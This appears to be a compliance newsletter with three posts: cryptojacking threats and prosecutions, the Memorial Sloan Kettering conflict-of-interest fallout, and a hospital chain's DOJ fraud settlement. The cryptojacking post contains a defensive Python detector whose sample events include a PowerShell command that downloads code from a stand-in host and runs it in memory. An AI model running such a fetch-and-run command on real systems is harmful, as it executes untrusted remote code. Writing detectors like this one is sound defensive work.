Cryptojacking Expands Its Reach

Corporate compliance officers who have only general knowledge of longstanding cybersecurity threats, such as phishing and ransomware, need to familiarize themselves with the growing threat of “cryptojacking.”  Cryptojacking, also known as malicious cryptomining, is the unauthorized installation and use of cryptocurrency mining software on computers and mobile devices.

Cryptomining, of course, is integral to the verification of cryptocurrency transactions and the addition of those transactions to the blockchain digital ledger.  But cryptomining “consumes processor cycles and their requisite electricity to process cryptocurrency transactions,” while earning the cryptominer using his own computer only a small amount of cryptocurrency.  Because generation of more substantial amounts of cryptocurrency requires vastly greater amounts of electricity and processing power, cybercriminals increasingly seek to outsource their cryptomining operations by obtaining unauthorized access to others’ computers, where they can draw on unused processing power.

If cryptojacking was already “out of control” in 2017, as a Wired article headline declared, more recent reports from cybersecurity firms indicate that cryptojacking in 2018 is (if it is possible) even more so:

  • In June, a Kaspersky Labs report stated that during the 2017-2018 period, “cryptominer encounters rose in total number, from 1.9 million to 2.7 million, as well as in share of threats detected, from 3% to 4%.”
  • In August, Trend Micro reported that in the first half of 2018, it had 787,146 cryptocurrency mining detections – 1,055 percent of the detections in the first half of 2017 (74,547) and 241 percent of the detections in the second half of 2017 (326,326) – and identified 47 new cryptomining malware families.
  • In September, McAfee found that total cryptomining malware samples grew by 86 percent in the second quarter of 2018, and identified more than 2.5 million new cryptojacking files.

Moreover, certain features of current cryptojacking indicate that the problem is becoming more pervasive and more sophisticated:

  • Geographic Expansion: Cryptojacking malware is being detected around the world, most notably in North and South America, Europe, and Asia.
  • Expansion To and Within Corporate Entities: Cryptojacking is not limited to home computer users.  In July, Kaspersky Lab analysts reported that they had observed a new cryptojacking miner, PowerGhost, that “is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers.”  According to a Forbes article, cryptojackers are increasingly targeting servers. “Running in corporate and cloud data centers, servers are both vast in number and far more powerful than PCs and mobile devices, presenting . . . a fertile field for planting cryptojacking software.”
  • Infection Techniques: What makes PowerGhost more complex to detect and remove is its use of fileless techniques to embed the miner within the target system. The Kaspersky analysts noted that during the infection process, which can be done with exploits or remote administration tools, “a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive.”
  • Location of Cryptojacking Malware: Cryptojacking software can be embedded in places that are atypical of other types of malware.  For example, security researchers reportedly “found cryptojacking code hidden on the Los Angeles Times’ interactive Homicide Report webpage that was quietly harnessing visitors’ CPUs to mine Monero cryptocurrency.”
  • Malicious Response to Removal: 360 Total Security reported about one type of cryptomining malware that has been coded to ensure that an attempt to remove it will crash the computer. At the outset, the malware launches a system process that is part of the Windows operating system, svchost.exe, and injects malicious code into it.  It then sets svchost.exe’s attribute to “CriticalProcess.” That means that an attempt to terminate the malware will be read by the system as interference with a legitimate critical process in Windows and crash the computer.
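
The fileless PowerShell launch and the svchost.exe abuse described in the list above both leave traces in process-creation telemetry, and the following added example (not code from this article or from the vendors it cites) shows one way to check for them. The event field names, host names and sample events are constructed, and the rule that a genuine svchost.exe is started by services.exe from System32 is general Windows behaviour assumed here, not a statement from the cited reports.

```python
import re

# Assumed indicators: a network download call plus an in-memory invoke
# in the same PowerShell command line (nothing is written to disk).
DOWNLOAD = re.compile(r"downloadstring|downloaddata|invoke-webrequest|net\.webclient", re.I)
IN_MEMORY = re.compile(r"\biex\b|invoke-expression", re.I)
SYSTEM32 = "c:\\windows\\system32\\"

def findings(event):
    """Return the reasons one process-creation event looks suspicious."""
    image = event["image"].lower()
    parent = event["parent_image"].lower()
    cmd = event.get("command_line", "")
    name = image.rsplit("\\", 1)[-1]
    reasons = []
    if name in ("powershell.exe", "pwsh.exe"):
        if DOWNLOAD.search(cmd) and IN_MEMORY.search(cmd):
            reasons.append("powershell-download-and-run-in-memory")
    if name == "svchost.exe":
        # Assumption: genuine svchost.exe is started by services.exe from System32.
        if not parent.endswith("\\services.exe"):
            reasons.append("svchost-unexpected-parent")
        if not image.startswith(SYSTEM32):
            reasons.append("svchost-outside-system32")
    return reasons

def triage(events):
    """Return (host, reasons) for every event with at least one finding."""
    return [(e["host"], r) for e in events if (r := findings(e))]

# Constructed sample events (hypothetical field names, hosts and paths).
EVENTS = [
    {"host": "ws-014", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command IEX (New-Object "
                     "Net.WebClient).DownloadString('http://host.example.invalid/x')"},
    {"host": "ws-102", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"host": "srv-db-02", "parent_image": r"C:\Users\Public\updater.exe",
     "image": r"C:\Windows\System32\svchost.exe", "command_line": "svchost.exe"},
    {"host": "ws-101", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "command_line": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for host, reasons in triage(EVENTS):
        print(host, ", ".join(reasons))
```

Because a process marked critical cannot be terminated without crashing the machine, a host flagged by the svchost.exe checks is better isolated from the network and investigated than cleaned by killing the process.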

Because cryptojacking necessarily involves unauthorized access to computers, law enforcement authorities are prepared to investigate and prosecute cryptojacking schemes as cybercrime.  During 2018, at least four countries pursued law enforcement actions against cryptojacking:

  • China: 20 suspects were arrested “in a major cryptojacking case allegedly affecting over one million computers and generating 15 million yuan (about $2.2 million) in illicit profit.”
  • Iceland: Police arrested 11 individuals in connection with the theft, from data centers in Iceland, of approximately 600 computers being used to mine bitcoin and other virtual currencies.
  • Japan: Authorities arrested 16 men for allegedly using their websites to disseminate cryptomining malware, and a Japanese court reportedly sentenced a man, who had used his blog to infect visitors with cryptomining malware and engaged in cryptomining, to one year’s imprisonment (suspended for three years).
  • Russia: Security officers arrested “several scientists working at a top-secret Russian nuclear warhead facility for allegedly mining crypto-currencies.”

Compliance officers and their information security counterparts therefore need to recognize that cryptojacking is a cybercrime and treat it accordingly.  That means conducting a thorough review of what their companies are doing to address cryptojacking, including ensuring that their companies are using artificial intelligence and other techniques to identify penetration of corporate networks by cryptojacking teams.  But it also means refreshing compliance training to increase employee awareness of cryptomining across the enterprise.  Employees who notice significant slowing of their computers should be encouraged to report such occurrences, as they may be indicative of cryptojacking malware at work.

Finally, cryptojacking training needs to make clear to corporate employees that using company resources for cryptomining is prohibited under all circumstances.  In one case, the cybersecurity firm Darktrace

picked up on puzzling traffic patterns within a European bank, including servers that seemed to be connecting from an IP address in the company’s data center. When they inspected it in person, by physically tracing cables, its experts realized that a rogue employee had set up a “c[r]ypto mining side business” under the floorboards.

Memorial Sloan Kettering’s Conflicts-of-Interest Imbroglio: Four Lessons for Chief Compliance Officers

In the past four weeks, the world-renowned Memorial Sloan Kettering Cancer Center (MSK) in New York has experienced considerable turmoil, as a result of a series of media reports focusing on substantial conflicts of interest by MSK senior leaders:

  • On September 13, Dr. José Baselga, MSK’s chief medical officer, resigned his position, soon after the New York Times and ProPublica reported that Dr. Baselga had “fail[ed] to disclose millions of dollars in payments from health care companies,” including failure to disclose his outside financial ties in dozens of research articles that he had written for leading medical journals.
  • On September 29, the Times and ProPublica reported that a MSK vice president, Dr. Gregory Raskin, was required to turn over to MSK nearly $1.4 million of a windfall stake in stock options he had received from a biotech company, Y-mAbs Therapeutics, for representing MSK on Y-mAbs’s board.
  • On October 1, the Times and ProPublica reported that in an October 1 meeting with MSK’s staff, the chairman of MSK’s board of managers and overseers, Douglas A. Warner III, told the staff that Dr. Baselga “crossed lines that we should have done more to stop” and had gone “off the reservation” in his dealings with health-care and drug companies. Warner also acknowledged that “while we pushed back on a lot and discussed a lot, we were not as effective as we should have been,” and that Dr. Baselga “reported to me, and I wish I had done more to keep him away from the line.”

Note: MSK’s situation, even at this early stage of developments, contains four lessons that chief compliance officers in any industry should note and share with their companies’ senior executives.  First, corporate conflict-of-interest policies and associated standards and internal controls should leave no doubt about which types of outside financial interests are prohibited, which are permissible with appropriate full disclosure and prior approval, and which are permitted without the need for disclosure or prior approval.  According to ProPublica, Memorial Sloan Kettering did not have a prohibition against employees accepting personal compensation when they represent MSK on corporate boards. Other hospitals, cancer centers, and research institutions, however, have more clearly stated limitations or prohibitions on such outside ties. For example, the Cleveland Clinic reportedly prohibits employees from personally profiting when they are representing the Cleveland Clinic’s interests, and Partners HealthCare (founded by Brigham and Women’s Hospital and Massachusetts General Hospital) has a highly detailed policy on employee interactions with industry and other outside entities.

Second, the rapid sequence of events that followed the initial reporting by the Times and ProPublica shows how quickly damage to corporate reputation and internal morale can expand when serious undisclosed intracorporate conflicts of interest are publicly reported.  In his meeting yesterday with MSK staff, Warner reportedly “acknowledged ‘widespread anger’ among staff members and that the hospital’s reputation had been harmed.”

Third, if a company needs to address an intracorporate crisis with the media, it must make sure that its key messages in public statements are consistent.  In MSK’s case, an MSK spokesperson stressed that Dr. Baselga resigned and was not fired, but also stated that in the October 1 meeting Warner and MSK’s chief executive, Dr. Craig B. Thompson, were referring not to Dr. Baselga’s ties to outside companies but to a “conflict of commitment.”  The spokesperson added, “Dr. Baselga wanted to take on more, join more boards, be involved in more outside efforts. . . . He was overextended.”  Inconsistencies in public disclosures may well invite further adverse media coverage and complicate the task of crisis management.

Finally, a company in the midst of a crisis management situation must take special pains to manage its dissemination of information about internal discussions while it is still formulating a comprehensive response to the crisis.  The October 1 report by the Times and ProPublica stated that a preliminary transcript of Warner’s meeting with the hospital staff “was inadvertently emailed by the hospital to a reporter for The New York Times.”

U.S. Hospital Chain Reaches $260+ Million Resolution with Department of Justice in False Billing and Kickback Investigation

On September 25, the U.S. Department of Justice announced that Health Management Associates (HMA), formerly a Naples, Florida-headquartered hospital chain, had entered into an agreement with the Department requiring HMA to pay more than $260 million to resolve criminal and civil charges relating to defrauding the United States.  The Department alleged that HMA had engaged in

a corporate-driven scheme to defraud Federal health care programs by unlawfully pressuring and inducing physicians serving HMA hospitals to increase the number of emergency department patient admissions without regard to whether the admissions were medically necessary.  The scheme involved HMA hospitals billing and obtaining reimbursement for higher-paying inpatient hospital care, as opposed to observation or outpatient care, from Federal health care programs, increasing HMA’s revenue.

It also stated that HMA executives and HMA hospital administrators “executed the scheme by pressuring, coercing and inducing physicians and medical directors to meet the mandatory admission rate benchmarks and admit patients who did not need inpatient admission through a variety of means, including by threatening to fire physicians and medical directors if they did not increase the number of patients admitted.”

To resolve the criminal investigation, HMA entered into a three-year Non-Prosecution Agreement (NPA) and agreed to pay a $35 million penalty. Under the NPA’s terms, HMA and Community Health Services (CHS) – a hospital chain that acquired HMA after the alleged conduct at HMA occurred – agreed to cooperate with the Department’s investigation, report allegations or evidence of violations of federal health care offenses, and ensure that their compliance and ethics program satisfies the requirements of an amended and extended Corporate Integrity Agreement between CHS and the Department of Health and Human Services Office of Inspector General.  In addition, an HMA subsidiary, Carlisle HMA, LLC, agreed to plead guilty to one count of conspiracy to commit health care fraud, pertaining to a criminal information filed in the District of Columbia.

HMA also entered into a related civil settlement with the Department to resolve various claims and allegations of submission of false claims, paying remuneration to physicians in return for patient referrals, and submission of inflated claims for emergency department facility fees. As part of that settlement, HMA agreed to pay $216 million.

The allegations that the settlement resolved were originally brought in eight lawsuits filed under the qui tam (whistleblower) provisions of the False Claims Act.  Although the whistleblower shares have not been determined for all of those lawsuits,  the whistleblower in one of the cases will receive approximately $15 million as a share of the recovery, and the whistleblowers in a second case will receive approximately $12.4 million as their share of the recovery.

Note: This criminal and civil resolution with HMA is one of the most significant health care fraud-related cases that the Department of Justice (DOJ) has pursued against hospitals and hospital chains in recent memory.  The DHS – DOJ Health Care Fraud and Abuse Control Program Annual Report for Fiscal Year 2017 documents numerous instances of criminal cases against other categories of health care providers and services, such as medical providers operating “pill mills,” providers and clinics submitting false claims to Medicare, drug companies paying kickbacks to providers to prescribe their drugs, and pharmacies soliciting and receiving kickbacks from pharmaceutical companies for promoting their drugs.  In contrast, during Fiscal Year 2017, cases involving hospitals and health systems involved only civil settlements of liability under the civil False Claims Act, and the largest of those settlements was $57.5 million.

The resolution is also of interest for the breadth of alleged tactics that HMA executives and HMA hospital administrators used to increase emergency department patient admissions.  As a general proposition, federal laws such as the Anti-Kickback Statute and the Stark Law are designed, as the Department’s HMA release stated, “to ensure that physician decision-making is not compromised by improper financial incentives.”  Positive financial incentives, such as direct payments or reduced or free rent for office space, to make patient referrals are to be expected; negative financial incentives, such as threatening to fire physicians and medical directors for failure to increase patient admissions, are not.    Given the latter types of conduct mentioned in the HMA resolution, and HMA’s and CHS’s commitment to continue to cooperate with the Department, compliance officers who track health care fraud developments should not be surprised if the Department ultimately pursues cases against formerly HMA-affiliated individuals.